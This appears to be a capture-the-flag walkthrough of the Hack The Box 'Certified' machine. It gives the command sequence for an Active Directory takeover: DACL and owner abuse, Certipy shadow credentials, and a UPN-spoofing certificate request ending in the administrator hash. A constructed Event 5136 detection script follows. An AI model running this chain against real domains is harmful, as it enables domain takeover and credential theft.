# Certified

### Certified HTB Walkthrough

### Initial Nmap Scan

```bash
nmap -p- -sVC 10.129.231.186
```

**Notable Ports and Services:**

* 53 (DNS)
* 88 (Kerberos)
* 389/636/3268/3269 (LDAP)
* 135, 139, 445 (SMB, NetBIOS)
* 5985 (WinRM)
* 9389 (.NET Message Framing)
* Various high RPC ports

### SMB Authentication Attempt

```bash
nxc smb certified.htb -u judith.mader -p judith09
```

**Result:**

* Successful login: `certified.htb\judith.mader`

### Enumerating Shares (First Attempt Fails)

```bash
nxc smb DC01.certified.htb --shares
```

**Result:**

* `STATUS_USER_SESSION_DELETED` (the command above passes no `-u`/`-p`)

### WinRM Login Attempt

```bash
nxc winrm certified.htb -u judith.mader -p judith09
```

**Result:**

* Login failed

### Enumerating Shares (Successful)

```bash
nxc smb DC01.certified.htb -u judith.mader -p judith09 --shares
```

**Result:**

* ADMIN$
* C$
* IPC$
* NETLOGON
* SYSVOL

### BloodHound

<figure><img src="https://4187092187-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7vz2dQyURlXIwrroPZNZ%2Fuploads%2FD5D56RMEW4rZdYrxNSAz%2Fimage%20(2).png?alt=media&#x26;token=5ed2415d-9a23-4bb4-a137-31180ac60b21" alt=""><figcaption></figcaption></figure>

### Owner SID Modification

```bash
owneredit.py -action write -new-owner judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.129.231.186
```

**Result:**

* OwnerSid of Domain Admins modified successfully

### DACL Permission Injection

```bash
dacledit.py -action 'write' -rights 'WriteMembers' -principal judith.mader -target management "certified.htb"/"judith.mader":"judith09"
```

**Result:**

* DACL modified successfully

### Add User to Group

```bash
net rpc group addmem management judith.mader -U "certified.htb"/"judith.mader"%"judith09" -S 10.129.231.186
```

**Result:**

* Successfully added

### Shadow Credentials Attack with Certipy (First Attempt Fails)

```bash
certipy shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc -target certified.htb -dc-ip 10.129.231.186
```

**Result:**

* Clock skew error

### Shadow Credentials Attack with Correct Time Sync

```bash
sudo ntpdate 10.129.166.118
certipy shadow auto -target certified.htb -dc-ip 10.129.68.9 -username judith.mader@certified.htb -password judith09 -account management_svc
```

**Result:**

* NT hash for `management_svc` retrieved: `a091c1832bcdd4677c28b5a6a1295584`

### Confirm Access with NT Hash

```bash
nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
```

### Enumerate Shares and Users

```bash
nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 --shares
nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 --users
```

### Confirm WinRM Access

```bash
nxc winrm certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
```

### Evil-WinRM Shell Access

```bash
evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
```

### Identify ADCS Server

```bash
nxc ldap certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 -M adcs
```

### Shadow Credentials on ca\_operator

```bash
certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -target certified.htb -dc-ip 10.129.166.118
```

**Result:**

* NT hash retrieved: `b4b86f45c6018f1b664f70805f45d8f2`

### Modify UPN to Administrator

```bash
certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator
```

### Request Certificate with Administrator UPN

```bash
certipy req -username ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -debug
```

**Result:**

* Certificate issued with UPN: `administrator`
* Saved as `administrator.pfx`

### Authenticate as Administrator with Certificate

```bash
certipy auth -pfx administrator.pfx -domain certified.htb
```

**Result:**

* NT hash retrieved (printed in `LM:NT` form): `aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34`
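
### Detection Notes

The directory changes made in this walkthrough (the security-descriptor edit on the group, the key-credential writes, and the UPN change on `ca_operator`) are all visible in Event ID 5136 on the domain controller. The Python sketch below is an added example, not part of the original walkthrough. It classifies such records and reports the actor/target pair that shows both account changes. It assumes Directory Service Changes auditing is enabled with SACLs covering these attributes. The records, DNs, allow-lists and the `helpdesk`, `alice` and `DC01$` names are constructed.

```python
from collections import defaultdict

VALUE_ADDED = "%%14674"               # Event 5136 OperationType code for "Value Added"
PRIVILEGED_NAMES = {"administrator"}  # assumption: names a UPN must never imitate
KEYCRED_WRITERS = set()               # assumption: accounts expected to write key credentials

def ev(actor, cn, cls, attr, value):
    """Build one constructed, simplified 5136 record (DN container is made up)."""
    return {"EventID": 5136, "OperationType": VALUE_ADDED, "SubjectUserName": actor,
            "ObjectDN": f"CN={cn},CN=Users,DC=certified,DC=htb", "ObjectClass": cls,
            "AttributeLDAPDisplayName": attr, "AttributeValue": value}

SAMPLE_EVENTS = [  # constructed to mirror the order of changes in the walkthrough
    ev("judith.mader", "Management", "group", "nTSecurityDescriptor", "<sddl>"),
    ev("judith.mader", "management_svc", "user", "msDS-KeyCredentialLink", "<blob>"),
    ev("management_svc", "ca_operator", "user", "msDS-KeyCredentialLink", "<blob>"),
    ev("management_svc", "ca_operator", "user", "userPrincipalName", "administrator"),
    ev("helpdesk", "alice", "user", "userPrincipalName", "alice@certified.htb"),
]

def cn_of(dn):  # first RDN value, lower-cased; stands in for sAMAccountName here
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def classify(e):
    """Return a finding name for one record, or None if it is not of interest."""
    if e.get("EventID") != 5136 or e.get("OperationType") != VALUE_ADDED:
        return None
    attr = e["AttributeLDAPDisplayName"].lower()
    actor, target = e["SubjectUserName"].lower().rstrip("$"), cn_of(e["ObjectDN"])
    if attr == "msds-keycredentiallink" and actor != target and actor not in KEYCRED_WRITERS:
        return "key-credential-added-by-other-principal"
    if attr == "userprincipalname":
        local = e["AttributeValue"].split("@", 1)[0].lower()
        if local in PRIVILEGED_NAMES and local != target:
            return "upn-imitates-privileged-account"
    if attr == "ntsecuritydescriptor" and e.get("ObjectClass") == "group":
        return "group-security-descriptor-changed"
    return None

def detect(events):
    """Return (actor, target, finding) rows and the pairs that show both account changes."""
    rows, seen = [], defaultdict(set)
    for e in events:
        if (name := classify(e)):
            pair = (e["SubjectUserName"].lower(), cn_of(e["ObjectDN"]))
            rows.append(pair + (name,))
            seen[pair].add(name)
    chain = {"key-credential-added-by-other-principal", "upn-imitates-privileged-account"}
    return rows, sorted(p for p, names in seen.items() if chain <= names)
```

`detect(SAMPLE_EVENTS)` returns four findings and one chained pair, `("management_svc", "ca_operator")`. In a real environment, populate `KEYCRED_WRITERS` with the sync or federation accounts that legitimately write `msDS-KeyCredentialLink`.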
